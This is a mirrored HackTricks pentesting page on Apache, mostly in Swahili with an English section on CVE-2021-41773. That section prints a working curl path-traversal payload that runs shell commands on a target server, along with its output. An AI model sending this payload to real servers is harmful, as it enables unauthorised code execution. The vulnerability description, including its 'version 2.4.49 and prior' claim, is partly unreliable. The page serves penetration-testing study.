Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 14:40:37 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-web/apache.md
Translator workflow 54a7bb5de7 Translated to Swahili
2024-02-11 02:13:58 +00:00

4 KiB
Raw Blame History

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Vipengele vya PHP vinavyoweza kutekelezwa

Angalia vipengele ambavyo Apache server inatekeleza. Unaweza kuyatafuta kwa kutekeleza:

grep -R -B1 "httpd-php" /etc/apache2

Pia, maeneo kadhaa ambapo unaweza kupata usanidi huu ni:

/etc/apache2/mods-available/php5.conf
/etc/apache2/mods-enabled/php5.conf
/etc/apache2/mods-available/php7.3.conf
/etc/apache2/mods-enabled/php7.3.conf

CVE-2021-41773

Description

CVE-2021-41773 is a vulnerability in the Apache HTTP Server that allows remote attackers to execute arbitrary code or disclose sensitive information. This vulnerability affects Apache versions 2.4.49 and prior.

Exploitation

To exploit this vulnerability, an attacker can send a specially crafted HTTP request to the vulnerable server. By including a directory traversal sequence in the request, the attacker can access files outside of the server's document root directory.

Impact

The impact of this vulnerability can be severe. An attacker can potentially gain unauthorized access to sensitive files, such as configuration files, user data, or even execute arbitrary code on the server.

Mitigation

To mitigate this vulnerability, it is recommended to upgrade to Apache version 2.4.50 or later. Additionally, it is advised to implement proper access controls and restrict access to sensitive files and directories.

References

curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks: